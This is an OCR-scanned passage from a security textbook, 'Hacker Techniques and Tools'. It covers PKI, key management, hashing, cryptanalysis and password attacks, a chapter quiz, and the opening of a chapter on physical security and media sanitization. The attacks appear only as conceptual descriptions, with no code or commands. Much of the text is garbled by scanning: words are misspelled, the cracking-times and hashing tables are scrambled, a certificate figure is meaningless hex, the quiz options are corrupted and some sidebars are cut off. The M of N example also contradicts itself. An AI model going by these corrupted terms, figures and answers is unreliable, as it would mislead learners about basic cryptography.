the system grows. Consider the fact that in small groups it is possible for users to exchange
public keys based on a previously established level of trust. At the size of an enterprise or
the Internet, knowing one another ahead of time and basing key exchange on this is not
feasible. PKI provides a solution to this problem because it provides a mechanism through
which keys can be generated and bound to a digital certificate that can be viewed and
validated by all parties. To ensure trust. PKI also addresses storing, managing, distrib-
uting, and maintaining the keys securely. For any PKI system to be used, a level of support
for the binding between a key and its owner requires that both a public key and a private
key be created and maintained for each user. Public keys must be distributed or stored in
a secure manner that prevents the keys from being tampered with or altered hi any way.

Another important issue is key recovery. In any complex environment like PKL the
possibility for key loss or for a key to be compromised exists, so the system must have
safeguards in place for this. Consider a scenario in which an employee or other individual
leaves an organization on less than ideal terms such as being terminated for cause. In
such situations, there exists a real possibility that retrieving the key from the individual
may be impossible or unlikely, In these situations, there must be safeguards to retrieve
said key or provide backup mechanisms in the event that vital data must be decrypted,
for example. One option in this situation is known as key escrow, which can be used as
a way to delegate responsibility of keys to a trusted third party. In such mechanisms, the
third party holding the keys securely is known as a key escrow agent. In this situation,
keys are kept sate by the third party and access to the keys is granted only if certain
predefined guidelines have been met.

68

PART 1 Hacker Techniques and Tools

M of N

M of N is another way to ksep keys secure while ensuring access. In M of N, a key
is broken into pieces, and the pieces are distributed in different combinations to trusted
parties. If the key is needed, some (but not all) of the holders must be present to be able
to reassemble the key. For example, if a key is broken into three parts, two of the three
individuals are needed to retrieve the key because every individual has only two parts
and needs one other person to get the whole key.

M of N is particularly useful in situations where a key not only needs to be easily
recoverable but also in situations where the key is used in particularly sensitive operations.
M of N prevents any one person from retrieving a key alone, so the individual must work
(or collude) with another individual to help retrieve the key.

Finally, determine how long a key will be valid and set a key lifetime. The lifetime for
a key can be any length that is determined to be useful or practical in a given situation.
Keys used more frequently tend to be assigned shorter life spans, whereas keys that
are used less frequently tend lo have much longer life spans. Keys that are used more
frequently tend to have shorter lifetimes simply because increased usage means more
of it has been used with more encryption operations, so there are many more pieces
of information an attacker can analyze to deLermine the key. Another common factor
in determining key lifetime is that of usage, specifically what the key will be used for in
practice. For example, an organization m ay assign keys of different lifetimes to temporary
versus permanent employees. Suppose that some information may be valuable only for
a short period of time* while other data may need protection for longer periods of time.
For example, if the piece of information being encrypted will be essentially useless in
a week’s time, a key lifetime longer than a week may be pointless. Also consider what
happens at the end of a key’s lifetime. Keys cannot simply be erased from media or deleted
in some other way: they must be carefully destroyed using the proper technique suitable
for the environment. Even more important to the issue of key lifetime and destruction
is the fact that keys might not simply be retired, but they may have been lost or compro-
mised > which can be more serious issues in some cases.

• { ™ J

Key zeroization is a technique used during the key destruction process. This process is the activity
of clearing all the recorded data about the key and leaving only zeros in its place. The process is
designed to prevent the recovery of keys from media or a system using file recovery or forensics
techniques. Mote that any time keys are distributed on a medium that can be copied, there may
be no way to ensure that every copy has been destroyed.

I

CHAPTER 3 Cryptographic Concepts

69

The Role of Certificate Authorities (CAs)

Certificate authorities perform several import Eint functions that make them important
PKIs. The main function or capability of the CA is to generate key pairs and bind a user’s
identity to the public key. The identity that the public key is hound to by the CA is the
digital certificate that validates the holder of the public key. lice a use the CA is validating
the identity of users and creating items such as key pairs that are in turn used to perform
sensitive operations, it is important that the CA he trusted. The CA must be a trusted
entity in much the same way as the DMV is trusted with driver’s licenses and the State
Department is trusted with passports. The CA and the PK1 systems function on a system
of trust, and if this is in question, serious problems can result. The CA issues certificates
to users and other certification authorities or services, CAs issue certification revocation
lists fCRLs) that are periodically updated and post certificates and CRLs to a repository.
CAs include the types shown here:

Root CA — The CA that initiates all trust paths. The root CA is also the principal
CA for that domain. The root CA can be thought of as the top of a pyramid if
that pyramid represents the CA hierarchy.

Peer CA — Has a self-signed certificate that is distributed to its certificate holders
and used by them to initiate certification paths.

Subordinate CA — A certification authority in a hierarchical domain that does
not begin trust paths. Trust initiates from some root CA,
In some deployments, it is referred to as a child CA.

Registration Authority (RA)

The R A is an entity positioned between the client and the
CA that is used to support or offload work from a CA. Although
the RA cannot generate a certificate it can accept requests,
verify a person’s identity, and passes along the inform tition
to the CA that would perform the actual certificate generation,
RAs are usually located at the same location as the subscribers
for which they perform authentication.

Certificate Revocation List (CRL)

A CRL is a list of certificates that have been revoked. Typically, a certificate is added to
a CRL hecause it can no longer be trusted. Whether there is a loss of a key or an employee
has left the company is unimportant — if trust is lost,, onto the CRL it goes, It is for these
reasons that the CRL must be maintained. CRLs also provide important mechanisms for
documenting historical revocation information, The CRL is maintained by the CA, and the
CA signs the list to maintain its accuracy. Whenever problems are reported with digital
certificates and they are considered invalid, and the CA would have their serial numbers
added to the CRL. Anyone requesting a digital certificate can check the CRL to verify the
certificate’s validity.

NOTE

Because RAs do not have a
database or generate certificates
or keys, they do not have the
same security requirements as a
CA, In most cases, an RA will have
lesser security than a CA, However
in those cases such as with LRAs,
higher security is a necessity as
these unique versions do issue
certificates as delegated by a CA.

70

PART 1 Hacker Techniques and Tools

^MOTE

The most current version
of X.509 is version 3.

J

Digital Certificates

Digital certificates provide an important form of identification on the Internet and in
other areas. Digital certificates play a key role in digital signatures, encryption, and
e-commercc, among others. One of the primary roles that the digital certificate serves is
ensuring the integrity of the public key and making sure that the key remains unchanged
and in a valid form. The digital certificate also validates that the public key belongs to
the specified owner and that all associated information is true and correct. The infor-
mation needed to accomplish these goals is determined by the CA and
by the policies in place within the environment. Some information is
mandatory in a certificate; other data is option til and up to Ihe admin-
istrators of the structure. To ensure compatibility between CAs, digital
certificates are formatted using the X.509 standard. The standard
is a commonly used format used in the creation of digital certificates.
An X.509 certificate includes the following elements (see Figure 3-6):

Version
Serial Number
Algorithm ED
Issuer
Validity
Not Before
Not After
Subject

Subject Public Key Info
Public Key Algorithm
Subject Public Key
Issuer Unique Identifier (Optional)
Subject Unique Identifier (Optional)
Extensions (Optional)

Clients are usually responsible for requesting certificates and for maintaining the secrecy
of their private key. Because loss or a compromise of the private key would mean that
communications would no longer be secure, holders of such keys need to be aware of and
follow reporting procedures in the event a key is lost or compromised. Loss of a private key
could result in compromise of all messages intended for that recipient, even if the key
is posted immediately to a CRL.

There are seven key management issues that organizations should be concerned with:

• Generation
• Distribution

• Installation

• Storage

• Key Change

• Key Control

• Key Disposal

• CHAPTER 3 Cryptographic Concepts

Certificate

FIGURE 3 6

X509 certificate.

Yah* A

m*l2wib.carij Ctffedo ev 55…

key

R5A 0 DEI Bits)

E^A-jthwitj’ Kev idem-fist

KsylD-?f ft 4c 36 20 ]1a* c…

Sub j«t KiyUcntlV

^Ertanced Key Uf^t

Ssr-rtSr Ay^herte*icp ( 1 , 3 ,, ,

Ptli-Jetscaee Cert Tvna

55L Clertt Authentication. 53. ,., v

*

>

3D 01 6^ 02 01 Bl 00 ba b7 bl 73 63 67 25

57 20 0 km *2 ml 79 a 18 3. 64 c5 76 92

62 63 54 7a 31 Od 45 19 34 da 11

6b 03 Se 07 2a 02 42 9£ 75 00 31

04 7b 54 01 70 i? 16 al cb cf

b2 i9 b6 cd 0« eb c* 24 74 b4

a? lb a* 91 a6 34 da 99 e9 04

36 6d a8 03 d3 3d 35 96 03 ££

20 33 30
ab 5a 46
7b 70 00
44 dc 1b
96 ol db d4
a? 10 el e3

00
63

a4 70 14 21 60 73 13 42 3c 12 cl c3 £3 cl

OK

There arc several ways to properly protect keys, including split knowledge and what is
known as dual control. Split knowledge and dual control are used to protect the centrally
stored secret keys and root private keys, secure the distribution of user tokens, and
initialize all crypto- modules in the system to authorize their cryptographic functions
within a system,

PKI Attacks

There are several ways a hacker or malicious individual can target a PKI lor attack:

• Sabo ta g e — The PK I com ponents or hard w a re m ay be su b je cted to a number
of attacks including vandalism, theft, hardware modification, and insertion
of malicious code. Most attacks are designed to cause denial of service (DoS).

Communications disruption/modification — These attacks target communications
between the subscribers and the PKI components. The disruption could cause
DoS, but may also be used by the attacker to mount additional a tt ticks such as
impersonation of a subscriber or the insertion of fake information.

• Design and implementation flaws — These attacks target flaws in the software
or hardware on which the subscriber depends to generate or store key material
and certificates, The attacks can result in malfunctions of the software or hardware
that may cause DoS.

• Operator error — These attacks target improper use of the PKI software or hardware
by the operators may result in DoS or the disclosure or modification of subscriber
keys and certificates.

PART 1 Hacker Techniques and Tools

• Operator impersonation — These tit tacks target the user by impersonating

a legitimate PKI operator. As an operator, the attacker could do almost anything
a legitimate operator could do, including generate keys, issue certificates, revoke
certificates, and modify data.

• Coercion — These attacks occur when the administrator or operator of a CA is
induced into giving up some control over the CA or creating keys and certificates
under duress.

Hashing

A one-way hashing function is a concept in cryptography that is responsible for integrity.
It is designed to he relatively easy to compute one way. but hard to undo or reverse.
Hashing is designed to provide a unique data fingerprint that will change dramatically in
the event of data alteration or tampering. Hashed values or message digests are the result
of a variable amount of data being compressed into a fixed-length field. Hashes are not
used for encryption, hut for authentication as well as ensuring integrity, A one-way hash
function is also known as a fingerprint.

Some of the most common hashing algorithms include the following:

Message Digest 2 [MD2) — A one-way hash function used in the privacy enhanced
mail (PEM) protocols along with .VI D^. It produces a 128-bit hash value for an
arbitrary input, It is similar in structure to MD4 and MD5. hut is slower and less
secure.

Message Digest 4 (MD4) — A one-way hash function that provides a 128-bit hash
of the input message.

• Message Digest 5 (MD5) An improved and redesigned version of MD4,
producing a 128-bit hash.

• HAVAL — A variable-length, one-way hash function and modification of MD 5.
1 1 AVAL processes the messages in blocks of 1 .024 bits, twice that of MD5,
and is faster than MD5.

• Secure Hash Algorithm-!) (SHA-0}— Provides a 160-bit fingerprint SHA-0
is no longer considered secure and is vulnerable to att ticks,

• Secure Hash Algorithm-1 (SHA-1) — Processes messages up to 512 bit blocks and
adds padding if needed to get the data to added up to the right number of bits,
SUA also includes other versions, including SH A-2 5 6 and SHA-512, which are
part of the SHA-2 group.

The process of hashing is one way, and any change to the data being hashed will result
in a completely different hash. An example ol It ashing can be seen in Table 3-3,

CHAPTER 3 Cryptographic Concepts

table 3-3 The hashin

g process.

KEYS

HASH FUNCTION

HASH

George Washington

e

01

Sakagawea

02 |

Abraham Lincoln

|

03

Margaret Chase Smith e 04

A hash algorithm can be compromised with a collision, which occurs when two separate and
different messages or inputs pass through the hashing process and generate the same value.
This behavior can be substantially reduced by choosing algorithms that generate longer hash
values. For example, a 160-bit hash is less prone to a collision than a 128-bit hash is. Note
that it is unlikely for two intelligible messages to result in a collision. Often a message has
to be “padded” with many bytes of filler to achieve the match, which should be an indication
to the receiver that something may be wrong.

Birthday Attacks

A collision is closely related to or borrows from what is sometimes known as the Birthday
attack or paradox in probability theory. The paradox is a problem that deals with the
probability of individuals sharing the same birthday. Essentially the question is r what is the
fewest number of people chosen randomly such that the probability that two have the
same birthday is greater than 50 percent. The answer is 23, far fewer than most people
would guess. (Fifty-Seven people have a 99 percent probability that at least two have
the same birthday.)

In cryptography, the goal is to exploit the possibility that two messages might share the
same message digests. The attack is based on probabilities in which it finds two messages
that hash to the same value (collision) and then exploits it to attack. MD5 can be targeted
for a birthday attack.

PARTI Hacker Techniques and Tools

Common Cryptographic Systems

Organizations that store or transmit sensitive information ceio benefit from cryptographic
protection. Although current U.S, laws do not place any restrictions on the types and
nature of cryptosy stems that can be sold within ILS, borders h exportation of cryptosystems
from Lhe I .S, is regulated. In the prist, encryption systems wen: placet! into the same
category as munitions or weapons technology so approval from the State Department
w r as needed to export the technology. In recent history, however cryptosystems have
been reclassified as dual-use technology, so export controls are somewhat more relaxed.
One of the problems with controlling the export of crypto systems in today’s world is that
lhe Internet allows cryptographic systems to be much more easily used. Another factor
that lessens the impact of export controls is the increasingly popularity of non-U.S.
cryptographic systems such as the IDEA protocol.

Some common cryptographic systems include the following:

Message Security Protocol (MSP) The Department of Defense (DoD) Defense
Messaging System that provides authentication, integrity, and nonrepudiation
services.

• SSH — An application that provides secure remote access captibilities. SSII is viewed
as a replacement for the insecure protocols FTP, Telnet, and the Berkeley f -utilities.
SSII defaults to port 22. SSI Iv 1 has been found to contain vulnerabilities, so it is

Secure Hypertext Transfer Protocol (S-HTTP} — A superset of Hypertext Transfer
Protocol (HTTP I thai was developed to provide secure communication w r ith a
Web server. S-HTTP is v\ connectionless protocol that is designed to send individual
messages securely,

• SSL — Introduced by Netscape as a means tor transmitting information securely over
the Internet, Unlike S-HTTP, SSL is application independent. SSL is cryptographic
algorithm-independent. The protocol is merely a framework to communicate
certificates, encrypted keys, and data.

Transport Layer Security (TLS) — Encrypts the communication between a host
and clicnl. TLS is composed of two layers^ including the TLS Record Protocol
and the TLS Handshake Protocol.

» IPSec — An end-lo-end security technology that allows two devices to communicate
securely. IPSec w T as developed to address the shortcomings of Internet Protocol
version 4 (IPv4). While it is an add-on for IPv4, it is build into IPv6. IPSec can be
used to encrypt just the data or the delta and the header.

• Password Authentication Protocol (PAP)— Used for authentication, but is not secure
because the user name and password is transmitted in clear text.
• Challenge Handshake Authentication Protocol (CHAP) — More secure than PAP
because of the method used to transfer the user name and passwwd. Its strength
is that it uses a hashed value that is valid only for a single logon transaction.

• CHAPTER 3 Cryptographic Concepts

75

• Point -to- Point Tunneling Protocol (PPTP) — Developed by a group of vendors, PPTP
is composed of two components: the transport that maintEiins the virtual connection
and the encryption that ensures confidentiality.

Cry plana lysis

Cryptographic systems much like any security control have attacks specially designed
to exploit weaknesses in the system. In the CEise of encryption, specitic attacks may be
more aggressive and targeted because the use of encryption suggests that something
of increased value is present and desirable to access. When you examine the strength
and power of encryption, It is easy to believe, at least initially, that the technology is
unbreakable in all but a few cases. Most encryption can be broken if an attacker has the
computing power, creativity, smarts, and sufficient time. Attacks that often work against
cryptography include brute-force attack methods, which try every possible sequence of
keys until the correct one is found. One problem with the brute-force attack, however,
is that as the key lengths grow, so do the power and time required to break them. For
example, Y)YS is vulnerable to brute-force attacks, whereas Triple-] )KS encryption is very
resistant to brute-force attack. To illustrate this concept, consider Table 3-4.
Some attacks that have been and are employed are:

Ciphertext-only attack — An attacker has some sample of ciphertext but lacks the
corresponding plaintext or the key. The goal is to lind the corresponding plaintext
in order to determine how the mechanism works. Ciphertext-only attacks tend to be
the least successful based on the fact that the attacker has very limited knowledge
at the outset.

Known plaintext attack — The attacker possesses the plaintext and ciphertext of one
or more messages. The attacker will then use this acquired information to determine
the key in use. In reality this attack shares many similarities with brute-force attacks.

• Chosen plaintext attack — The attacker is EibJe lo generate the corresponding
ciphertext to deliberately chosen plaintext. Essentially, the attacker can “feed 1 ‘
information into the encryption system and observe the output. The attacker may
not know the algorithm or the secret key in use.

table 3-4 Cryptographic cracking times.

USER

BUDGET

40-BIT KEY

56-BIT KEY

Regular user

$400 1 week 40 years Small business$10,000

12 minutes

556 days ^^^^^

Corporation

$300,000 24 seconds 19 days Large multinational$10 million

.005 seconds

6 minutes

Government agency

$300 rmHion .0002 seconds 12 seconds 76 PART 1 Hacker Techniques and Tools FY! The best way to protect against attacks on encrypted messages is to take the time to select a computationally secure encryption algorithm so that the cost of breaking the cipher acts as a deterrent to making the effort. Keep in mind that this must be periodically reassessed because what is computationally secure now may not be later. As an example, when DES was released in 1977 r experts estimated 90 years to brute force a key. Today, it can be done in hours. To date, there have been no successful attacks documented against AES. Chosen ciphertext attack — The attacker is able to decrypt a deliberately chosen cipher text into the corresponding plaintext. Essentially, the attacker can “feed” information into the decryption system and observe the output. The attacker may not know the algorithm or the secret key in use. A more advanced version of this attack is the adaptive chosen ciphertext attack (ACCA), in which the selection of the ciphertext is changed based on results. An attack that is successful in some situations is the replay attack, which consists of the recording and retransmitting of packets on the network. This attack takes place when an attacker intercepts traffic using a device such as a packet sniffer and then reuses or replays them at a later time. Replay attacks represent a significant threat for applications that require authentication sequences due largely to an intruder who could replay legitimate authentication sequence messages to gain access to a system. A somewhat similar but more advanced version of this attack is the man -in- 1 he-mid die attack (MitM). which is carried out when the attacker gets between two users with the goal of intercepting and modifying packets. Consider that in any situation in which attackers can insert themselves in the communications path between two users there is the possibility that interception and modification of information can occur. Do not forget that social engineering can be effective in attacking cryptographic systems. End users must be trained on how to protect sensitive items such as private cryptographic keys from unauthorized disclosure. Attackers are successful if they have obtained cryptographic keys, no matter how the task was accomplished. If they can FYJ j- Countermeasures against replay attacks include Kerberos, nonces, or tirnestarnps. Kerberos is a single sign-on authentication system that can reduce password posting and secure the authentication process. A nonce is a number used once. Its value is in adding randomness in cryptographic systems and authentication protocols to ensure that old communications cannot be reused. Tirnestarnps are used so that recipients can verify the timeliness of the message and recognize and/or reject replays of messages as needed. CHAPTER 3 Cryptographic Concepts decrypt sensitive information, it is “game over” for the defender. Social engineering Eil tacks can take many forms, including fooling or coercing a user to accept a self-signed certificate,, exploiting vulnerabilities in a Web browser, or taking advantage of the certif- icate approval process to receive a valid certificate and apply it to the attacker’s own site. Passwords represent one of the most commonly sought after and attacked items in IT and security. There are several methods that can be employed to attack and obtain passwords: • Dictionary attacks ■ Hybrid attacks • Brute- force attacks • Rainbow tables When examining the problems with passwords and the attacks that can be used, it is important not to forget some of the reasons why the attacks work, One of the common problems is the simple fact that many people use ordinary words as their password. When a user happens Lo choose a password that comes from the dictionary or is a name, it is much easier for an attacker to obtain the password by using methods such as a dictionary attack. To crack a password all an attacker has to do is obtain a piece of software with a dictionary list, which is easily obtainable. In most cases, the dictionary list or word files contain long lists of various words that have been predefined and can be quickly downloaded for use. While htiving a dictionary file will work against weak passwords, there is still the issue of obtaining the passwords in a format that can be used. To provide protection, passwords are commonly stored in a hashed format instead of in the clear. If hashing is used to store passwords, it is possible to thwart it by using an attack technique commonly known as comparative analysis. Simply put. each possible dictionary word is hashed and then compared with the encrypted password. Once a match is found, the password is discovered. If a match is not found, the process repeats until termination or a subsequent m atch is found. Brute -force password-cracking programs employ a decidedly lower-tech approach to breaking passwords by attempting every possible combination of characters in varying lengths. Brute-force attacks will eventually be successful given enough time, but that time might extend into the millions of years. Brute- force attacks can be very effective if many ■ FYI One effective attack against authentication systems that make use of a password is a hardware keylogger. The attacker attaches the device to the computer, waits for users to log or, and then later retrieves the keylogger with the username and passwords. There are many versions of ma I ware that do this as well; users inadvertently download the code by visiting an infected Web site. 78 PART 1 Hacker Techniques and Tools computers are used in parallel to perform the password search, creating a large network with the power to do so. Brute-force software has been fine-tuned over the last few years to work more evidently using techniques designed to decrease their search time by looking at things such as the password minimum Length, the pEissword maximum length, and password case sensitivity to further speed the recovery process. A relative newcomer on the scene of password cracking is an attack that uses a technique known as rainbow tables, in which a lookup tahle is used to offer a time- memory tradeoff In layman’s terms, a rainbow table is a database of pre computed hashes. These hashes are stored and then compared with encrypted password values with the goal of uncovering a match. Once a value matches the plaintext, the password is then revealed. The only downside of <i rainbow mhle is the size of the daia generated and the time taken to initially generate the tables. CHAPTER SUMMARY This chapter reviewed the concepts of cryptography. Although an extremely detailed knowledge of encryption is not necessary, an understanding of the mechanics of cryptography is important. Symmetric encryption works well ul bulk encryption, but it does have drawbacks such as problems with key exchange and scalability. Asymmetric encryption resolves the problems symmetric encryption has with key exchange and scalability, but is computationally more complex, and thus takes more processing time. Asymmetric encryption also makes use of two keys c idled key pairs. In asymmetric encryption, what one key does, the second undoes. Combining symmetric and asymmetric systems results In a very powerful solution because the best of both systems can be used. Modern cryptographic systems such as IPSee, SSH, SEX and others make use of both symmetric and asymmetric encryption. This chapter also reviewed hashing and how it is used to ensure integrity. When hashing is implemented into the digital signature process, the user gains integrity, authenticity, and no n repudiation. Digital signature techniques rely on the creation of a digest or fingerprint of the information using a cryptographic hash, which can be signed more efficiently than the en lire message. Finally, various types of cryptographic attacks were examined, including known plaintext attacks, ciphertext attacks, man in the middle attacks, and password attacks. Passwords can be attacked via dictionary, hybrid, brute force, or rainbow tables. CHAPTER 3 Cryptographic Concepts r , KEY CONCEPTS AND TERMS Asymmetric encryption Brute-force attack Dictionary attack Hash Symmetric encryption Trapdoor functions CHAPTER 3 ASSESSMENT 1. Which of the following Is not one of the key concepts of cryptography ? A, Availability B, Integrity C, Authenticity Q Privacy 1. Common sym metric encryption algorithms include all of the following except . A . A B. AtsS C IDEA D, DBS 1. A birthday attack can be used U> attempt Ut break A, DBS \L KSA C FKi D MUi 1. The best description of Keroi2ation ls_ A, Used to encrypt asymmetric data B, Used to create an MDS hash C, Used to cJear media of a kev value D, Used to encrypt symmetric data 1. What is the primary goal of PK1? A, Hashing B, Third-party trust C Nonreputatlon D, Availability 1. Digital signatures are wt used for A. Authentication li. Nun repudiation C. integrity D. Availability 1. Key management Is potentially the biggest problem in . A. Hashing B. Asymmetric encryption C. Symmetric en cryptic n 11 Cryptanalysis 8. is welJ suited for bulk encryption. A. MD=i IJ. DLijie 1 IcUinaiL C. DliS 11 RSA 3. . is Jirt* part of the key man age merit process. A. (feneration B. Storage C, Distribution D, Layering 1. Which attack requires the attacker to obtain several encrypted messages that have been encrypted using the same encryption algorith A. Known plaintext attack B. Cipher text only attack C. Chosen plaintext attack D. Random text attack 80 PART 1 Hacker Techniques and Tools 1 1 . What is another name for a one-time pad? A. Vcrnam cipher B. DKS C. Concealment cipher Q Caesar cipher 1. is an example of a hashing algorithm, A. MDS B. DES C. AES D. Twofish 1. Which i>f the following is the least secure? A. PAP B. CHAP C. IPSec CHAPTER 4 Physical Security WHEN DISCUSSING SECURITY it is easy to get caught up and immersed in the technology and the attacks associated with it. Take care not to forget areas such as physical security, however. The assets the security professional is charged with protecting are not just sitting “in a field” someplace. Each has facilities and other items surrounding it. Hackers know this fact so they focus not only on trying to break and subvert technology. They also spend significant time looking for weaknesses in the facilities and the physical assets that make structures such as the network possible. If a hacker can gain physical access to a facility, it is more than possible for that attacker to inflict damage to the organization by accessing assets that are not properly protected. Some security experts say that if attackers can achieve physical access to a system it is under their control, and the battle is lost. Good physical security must be well thought out and considered. You must carefully consider devices such as computers, servers, notebooks, cell phones r BlackBerrys, and removable media and put in place countermeasures to protect them. A basic example: Companies should position computer screens so that passersby cannot see sensitive data. They should also create a policy requiring users to secure their systems when they leave their computer for any reason. Chapter 4 Topics This chapter covers the following topics and concepts: • What basic equipment controls are ■ What physical area controls are What facility controls consist of What personal safety controls are and how they work • What physical access controls are and how they work How to avoid common threats to physical security What defense in depth is 81 Chapter 4 Goals Whan you complete this chapter, you will be able to: • Define the role of physical security • Describe common physical controls • List the purpose of fences • Describe how bollards are used • List advantages and disadvantages of guard dogs • Explain basic types of locks • Identify how lock picking works • List the usage of closed -circuit TV (CCTV) • Describe the concept of defense in depth » Define physical intrusion detection • List ways to secure the physical environment • Detail building design best practices • Describe alarm systems J Basic Equipment Controls Basic equipment controls are defensive measures placed on the front lines of security. These controls can be bo I h tin effective first line of defense as well as a visible deterrent to an attacker Equipment controls represent one layer of defensive measures and lis such coexist with technologic til and administrative controls. Keep in mind that there are many different types of controls that regulate access to equipment, each of which is used to prevent unauthorized Eiccess in some way. Some basic equipment controls covered in this section include the following: • Passwords • Password screen savers and session controls • Hard drive and mobile device encryption • Fax machines and public branch exchanges (PBX) Hard Drive and Mobile Device Encryption When discussing basic equipment controls another important area you should consider is the security of portable devices and hard drives, in today’s world there ts an ever-increasing number of portable devices such as hard drives as well as laptops, tablet PCs, and similar CHAPTER 4 Physical Security Health Net Inc. is not the only company to report the loss of data as a result of stolen drives or systems. In 2006 r the Department of Veterans Affairs (VA) lost the data of 26.5 million patients as the result of a lost laptop. While there was no evidence that the information had been accessed, the incident did result in a$20 million settlement. In 200S r the Registered
Traveler program in the United States was briefly blocked from taking new applicants after a
laptop containing the personal information of 33 r 000 people was lost. The laptop did resurface
a week later and did not appear tampered with, but the incident triggered a review of how
devices were handled within the program.

types of systems. Mobile devices have made working remotely easier but at the same time
the devices have introduced problems with the inevitable loss or theft oi” the device and
the data it carries. Hard drives with sensitive data represent a real risk for the organization
if they are lost, stolen > or misplaced. Consider a report from h ttpJI w ww r sea rchsecurity. com
that cited a 2009 case in which Health Net Inc. reported the loss of patient data as the
result of a delta security breach that led to the loss of data affecting 1.5 million customers.
Tn this case* the breach took place when an external hard drive that contained a mixture
of medical data, Social Security numbers, and other personally identifiable information
was lost.

The solution to such problems is the application of encryption. Encryption can be
applied on the file, folder, or an entire hard disk and provide a strong level of protection.
Applying encryption to an entire disk is known as full disk encryption or full volume
encryption. Full drive encryption, which is a technique that can be implemented in
hardware or software, encrypts all the data on a selected volume or disk as selected by the
owners of the system. With the widespread availability of full disk encryption, a security
professional should evaluate the viability of drive encryption for mobile devices as a
solution to theft h loss, and the unauthorized access to data. Software programs such as
Pretty Good Privacy (PGP), TrueCrypt, and BitLocker can be used to lock tiles and folders.
Microsoft offers data encryption programs such as BitLocker and Encrypted File System
(EFS) as part of the operating system in Windows Vista and Windows 20f)(k

r ^

Drive Encryption: Yes or No?

Drive encryption offers tremendous benefits and should be considered whenever mobile
devices are in use. However, it is important to remember that drive encryption isn’t always
the best solution or even useful in every case. As the old saying goes, “You don’t get
something for nothing” because the cost of using the technology is a bit of processor
power. While mobile systems are ideal candidates for full drive encryption, fixed systems
that are already in secure areas may not be good candidates for full drive encryption.

V

PART 1 Hacker Techniques and Tools

Be Afraid of Thumb Drives

Are you curious about how an attacker can so easily steal data or walk out with sensitive
information? It can take nothing more than a thumb drive to do so. If the attacker has
ma I ware such as a keylogger, password ripper, or data stealing program loaded on the
thumb drive, it could be that just inserting it into a computer couid launch a devastating
attack. This technique is commonly used during security assessment.

While discussing mobile devices, don’t forget the multitude of mobile storage options.
Companies used to be concerned about individuals carrying off sensitive information on
floppies. In today’s world, however, things have changed due largely to the availability and
storage capacities available on new devices. Today, companies have to seriously consider
the problems posed by mobile storage. Observe the situation in most workplaces: it is easy
to see a sea of iPods h universal serial bus (USB) thumb drives, portable hard drives, cell
phones with cameras, and even CD/DVD blanks and burners. Each of these devices has
the potential to move massive amounts of information out of an organization quickly and
quietly. Think for a moment about today’s most common mobile storage device: the USE
flash drive. These devices can carry upwards of 64GB of data in a package that is smaller
than a pack of gum. Also consider the fact that USB flash drives Eire common in an ever-
increasing number of forms, from watches to Swiss army knives to pens, making them
more difficult to detect. A December 2009 report from http:ll w w w. mih to r y . com describes
a recent hacking attack that occurred when a South Korean officer failed to remove a USB
thumb drive when the system switched from a restricted-access intranet to the Internet.

The examples cited here, as well as countless others* illusl rate ihm even an Item as
seemingly harmless as a thumb drive can become dangerous when connected to a system
that is part of a network. Under the right conditions, a thumb drive can be loaded with
malicious code and inserted into a computer. Because many systems have features such
as auto run enabled, the applications run automatically. Just the sheer number of these
portable devices [and their small size) raises the concern of network adtrnnlslralors tint!
security professionals alike. Asa security professional, one of your bigger challenges is
dealing with devices such as thumb drives. While the devices are a definite security risk,
they are universally recognized as convenient. The security professional will be required to
discuss the security versus convenience issue with management to enlighten all involved
of risks inherent in the system and any possible countermeasure. Whatever the decision
might be in an organization, there is a need to establish some policies to enforce manage-
ment’s decision. This policy should address all types of tried Ui eonlrols, how they are used,
and what devices such media can he connected to.

CHAPTER 4 Physical Security

85

Organizations should consider the implementation, or appropriate media controls,
that dictate how floppy disks h CDs, DVDs, hard drives, portable storage, paper documents,
and other forms of media are handled. Controls should dictate how sensitive media will
be controlled, handled, and deslirwed in an approved manner. Most important, the organi-
zation will need to make a decision about what employees can bring into the company
and install on a computer. Included in this discussion will be portable drives, CD burners,
cameras, and other devices. Management also needs to dictate how each of these
approved forms of storage can he handled. Finally, a decision on how media is to be
disposed of must be determined.

Media can be disposed of in many acceptable ways, each depending on the type of
data it was used to store and the type of media it happens to be. Paper documents can
be shredded, CDs can be destroyed, and magnetic media can be degaussed. Hard drives
should be sanitized, (Sanitization is the process of clearing all identified content so no
data remnants can be recovered.) When sanitization is performed, none of the original
information is easily recovered. Some of the methods used for sanitization are as follows:

• Drive wiping — Overwriting all information on the drive. As an example.
DoD.S2(M).2tf-STD (7) specifies overwriting the drive with a special digital
pattern through seven passes. Drive wiping allows the drive to be reused.

• Zero ization — A proc es s u s u a I ly a ssoc i a I ed w i t h c r y pt og ra phic
processes. The term was originally used with mechanical
cryptographic devices. These devices would be reset to 0
to prevent anyone from recovering the key In the electronic
realm, zero ization involves overwriting the data with zeros.
Zeroization is defined as a standard in ANSI X9.1 A

• Degaussing — Permanently destroys the contents of the hard
drive or magnetic media. Degaussing works by means of
a powerful magnet that uses its field strength to penetrate
the media and reverse the polarity of the magnetic particles
on the tape or hard disk platters. After media has been
degaussed, it cannot be reused. The only method more
secure than degaussing is physical destruction.

Fax Machines and Public Branch Exchanges

While lax machines are nowhere near as popular as they were in the 1990s, they
still remain an area of concern for the security prok-ssional. Digital fax machines
have been in use since the 1970s and continue to be used. When lax machines were
originally designed, it was not with security in mind, so information in faxes is transmitted
completely unprotected. Fax transmissions can potentially be intercepted h sniffed, and
decoded by the clever and astute attacker. Additionally, once at the destination, faxes
typically sit in a tray waiting for the owner to retrieve them t which sometimes takes a
long time. Faxes are vulnerable at this point because anyone can retrieve the fax and

NOTE

In certain situations
organizations have taken
the step of melting down
them. The perception here
is that this process makes
it impossible to recover the
contents of the drive; however,
when done correctly, wiping
a drive is extremely effective
at preventing recovery of data.

86

PA RT 1 H ac ke r Techn iq ues and Too I s

MOTE

An attacker picking up a fax
meant for another individual from
a tray can easily go unnoticed.
Consider that the recipient of a
fax often tells someone to resend
about where the original fax may
have gone.

! > NOTE

While PBX systems are typically
reserved for large companies
and not just anyone can get
access, it is not difficult to gain
search for a specific PBX system
will, after some investigation,
yield information on how to
system. With this information in
hand, an attacker can hack into
a PBX system and perform alt sorts
of actions that may go unnoticed.

J

Voice over IP (VoIP)

review its contents. Another issue is that cheap fax machines
retrieve the ribbon and use it as a virtual carbon copy of the
origin ei I document,

When performing a security assessment for an organization
it is important to take note of tiny fax machines present, what
they lily used tor. mid mix policies tJial dieliik. 1 ihe use oi such
devices. Worth noting is the fact that most organizations that
have fax numbers may not have a physical fax, having replaced
the devices with tax servers instead, which are not as obvious
to spot These devices can send faxes as well as receive faxes and
